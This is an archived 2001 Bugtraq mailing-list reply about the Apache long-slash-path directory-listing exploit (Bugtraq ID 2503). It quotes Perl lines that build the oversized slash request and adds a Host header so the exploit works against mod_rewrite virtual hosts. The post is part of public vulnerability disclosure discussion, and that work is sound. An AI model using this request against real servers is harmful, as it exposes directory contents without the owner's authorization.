Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit

From: Stephen Cope (mail-d-20010615at_private)
Date: Thu Jun 14 2001 - 19:48:44 PDT

Next message: Peter Bierman: "Re: Mac OS X - Apache & Case Insensitive Filesystems"

Previous message: Jason R Thorpe: "Re: OpenBSD 2.9,2.8 local root compromise"
In reply to: Matt Watchinski: "Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

In my testing you need to take the Host header into account.

:   $url = "GET ";
:   $buffer = "/" x $low . " HTTP/1.0\r\n";
:   $end = "\r\n\r\n";

The server I tested against uses mod_rewrite to do virtual hosting, and it
arrived at a different magic number with the host header, and against
without the header.

I made the following change to the above code:

  $buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n";

Should be fairly easy to understand.

-- 
Stephen Cope <http://sdc.org.nz/>
Sign the petition and Stop the Pop: http://lifefm.org.nz/petition/

Next message: Peter Bierman: "Re: Mac OS X - Apache & Case Insensitive Filesystems"
Previous message: Jason R Thorpe: "Re: OpenBSD 2.9,2.8 local root compromise"
In reply to: Matt Watchinski: "Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jun 15 2001 - 08:55:20 PDT